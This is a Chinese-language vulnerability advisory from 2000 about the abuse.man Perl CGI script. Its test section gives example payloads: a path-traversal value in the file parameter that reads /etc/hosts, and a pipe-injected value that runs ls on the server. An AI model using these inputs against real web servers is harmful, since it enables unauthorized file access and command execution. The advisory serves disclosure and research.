首页 -> 安全研究

安全研究

安全漏洞
abuse.man CGI漏洞可以执行任意命令

发布日期:2000-03-18
更新日期:2000-03-18

受影响系统:
abuse.man (webmanager kit)
描述:

abuse.man是一个perl cgi脚本,用来将client的请求转向指定页面,它也可以很容易地管理
虚拟主机。但是它存在一个有严重安全漏洞,允许远程或者本地用户`在web服务器上执行任意
命令(以httpd运行uid执行),攻击者可能利用这个漏洞获取更高权限.

<* 来源:  dethy (deth@synnergy.net)
           dvorak (dvorak@synnergy.net)
*>    


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


abuse.man用file变量来指定要转向的url地址(使用了绝对路径):

http://server.com/file=/disk1/e/domain/public_html/index.html&
domain=hostname.com&script=/index.html


攻击者可以修改file变量,这样就可以浏览系统文件或者执行任意命令。
例如:

浏览/etc/hosts文件:
Eg: file=/disk1/e/domain/public_html/../../../../../../etc/hosts&

通过增加管道符,可以执行命令,这里列出根目录内容:


Eg: file=/disk1/e/domain/public_html/../../../../../../bin/ls+/|&



建议:
暂无

浏览次数:6327
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障